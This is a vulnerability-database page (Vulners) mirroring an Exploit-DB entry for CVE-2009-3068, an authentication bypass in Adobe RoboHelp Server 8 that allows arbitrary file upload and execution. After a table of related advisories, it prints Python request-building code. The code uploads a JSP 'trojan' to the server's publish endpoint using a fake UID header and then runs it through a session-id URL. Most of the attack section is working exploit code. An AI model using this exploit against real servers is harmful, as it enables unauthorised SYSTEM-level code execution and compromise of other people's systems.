Lucene search
+L

Adobe RoboHelp Server 8 - Authentication Bypass

🗓️ 03 Sep 2009 00:00:00Reported by IntevydisType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 40 Views

Adobe RoboHelp Server 8 - Authentication Bypas

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2009-3068
3 Sep 200900:00
circl
Check Point Advisories
Adobe RoboHelp Server Arbitrary File Upload and Execute (CVE-2009-3068)
22 Mar 201000:00
checkpoint_advisories
CVE
CVE-2009-3068
4 Sep 200918:00
cve
Cvelist
CVE-2009-3068
4 Sep 200918:00
cvelist
d2
DSquare Exploit Pack: D2SEC_ROBOHELP
4 Sep 200918:30
d2
Dsquare
Adobe Robohelp Server 8 Upload
26 Jan 201200:00
dsquare
Exploit DB
Adobe RoboHelp Server 8 - Arbitrary File Upload / Execution (Metasploit)
24 Nov 201000:00
exploitdb
Metasploit
Adobe RoboHelp Server 8 Arbitrary File Upload and Execute
27 Sep 200918:38
metasploit
NVD
CVE-2009-3068
4 Sep 200918:30
nvd
OpenVAS
Adobe RoboHelp Server RCE Vulnerability (APSB09-14/APSA09-05)
10 Sep 200900:00
openvas
Rows per page
source: https://www.securityfocus.com/bid/36245/info

Adobe RoboHelp Server is prone to an authentication-bypass vulnerability. An attacker can exploit this issue to upload and execute arbitrary code with SYSTEM-level privileges.

RoboHelp Server 8.0 is affected; other versions may also be vulnerable.

b="-----------------------------111\r\n"
b+="Content-Disposition: form-data; name=\"filename\"; filename=\"test.jsp\"\r\n"
b+="Content-Type: application/x-java-archive\r\n\r\n"
b+=data # source code of our JSP trojan here
b+="\r\n"
b+="-----------------------------111--\r\n"

s="POST /robohelp/server?PUBLISH=1 HTTP/1.1\r\n"
s+="Host: %s:%d\r\n"%(host, port)
s+="User-Agent: Mozilla\r\n"
s+="UID: 1234\r\n"
s+="Content-Type: multipart/form-data; boundary=---------------------------111\r\n"
s+="Content-Length: %d\r\n"%len(b)
s+="\r\n"
s+=b

sock.sendall(s)
reply=sock.recv(4000)



Get the value of 'sessionid' from the reply and use it in the following to execute the JSP trojan:

s="GET /robohelp/robo/reserved/web/%s/test.jsp HTTP/1.0\r\n\r\n" % session_id
sock.sendall(s)

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation